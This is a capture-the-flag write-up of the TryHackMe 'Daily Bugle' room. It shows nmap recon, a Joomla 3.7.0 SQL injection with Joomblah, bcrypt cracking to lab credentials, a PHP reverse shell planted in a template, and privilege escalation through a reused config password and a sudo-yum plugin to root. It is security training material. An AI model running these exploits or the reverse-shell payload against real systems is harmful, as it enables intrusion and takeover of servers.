Daily Bugle - TryHackMe

# Nmap 7.93 scan initiated Sat Jan 28 18:23:15 2023 as: nmap -sC -sV -Pn -T4 -O -oN scans/nmap 10.10.111.176
Nmap scan report for bugle.thm (10.10.111.176)
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68ed7b197fed14e618986dc58830aae9 (RSA)
|   256 5cd682dab219e33799fb96820870ee9d (ECDSA)
|_  256 d2a975cf2f1ef5444f0b13c20fd737cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-title: Home
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-generator: Joomla! - Open Source Content Management
3306/tcp open  mysql   MariaDB (unauthorized)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36822%PV=Y%DS=4%DC=I%G=Y%TM=63D5AE8
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=FF
OS:%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 18:23:51 2023 -- 1 IP address (1 host up) scanned in 36.56 seconds

OpenSSH, MariaDB (mysql), and Joomla are running on the box.

website

The “Super User” post author and login page stand out to me.

Information at /language/en-GB/en-GB.xml shows that the site is running Joomla 3.7.0

Knowing this, I checked exploitdb

┌──(kali㉿kali)-[~/Rooms/daily-bugle]
└─$ searchsploit Joomla 3.7                          
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Joomla! 3.7 - SQL Injection                                                        | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection                                         | php/webapps/42033.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection                                   | php/webapps/46769.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection                        | php/webapps/38445.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                      | php/webapps/43488.txt
Joomla! Component J2Store < 3.3.7 - SQL Injection                                  | php/webapps/46467.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection                           | php/webapps/44117.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download           | php/webapps/43913.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection                                | php/webapps/42589.txt
----------------------------------------------------------------------------------- ---------------------------------

Exploit 42033 is linked to CVE-2017-8917 which eventually lead me to Joomblah

┌──(venv)─(kali㉿kali)-[~/Tools/joomblah]
└─$ python2 joomblah.py http://10.10.46.252:80 | tee ~/Rooms/daily-bugle/scans/joomblah
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', 'bcy$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

We can crack this hash with john

Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
spiderman123     (?)

Now that we have the creds jonah:spiderman123 we can get on the box by logging in through /administrator and inserting this into error.php by abusing the templates page

system('/bin/sh -i >& /dev/tcp/[local machine]/4000 0>&1');

┌──(kali㉿kali)-[~/Rooms/daily-bugle]
└─$ nc -lnvp 4000
listening on [any] 4000 ...
connect to [local machine] from (UNKNOWN) [10.10.28.175] 34368
sh: no job control in this shell
sh-4.2$

apache -> jjameson privesc

These users stood out to me in /etc/passwd

root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin

Linpeas found a database password (in some joomla-related file) that was valid for jjameson

╔══════════╣ Searching passwords in config PHP files
        public $password = 'nv5uz9r3ZEDzVjNu';
                        $this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
                        $this->password = null;
                        'password' => $this->password,

bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu

[jjameson@dailybugle protostar]$

user

jjameson -> root privesc

Linpeas found in the sudoers file that yum doesn’t require a password

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

Our privesc can be found on GTFObins

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

root

Hindsight

I tried sqlmap, joomla-brute, and droopescan before using joomblah
- might benefit from googling more first; found joomblah on an oscp prep page that mentioned 3.7.0
I could save a lot of time by cracking hashes outside my vm, especially bcrypt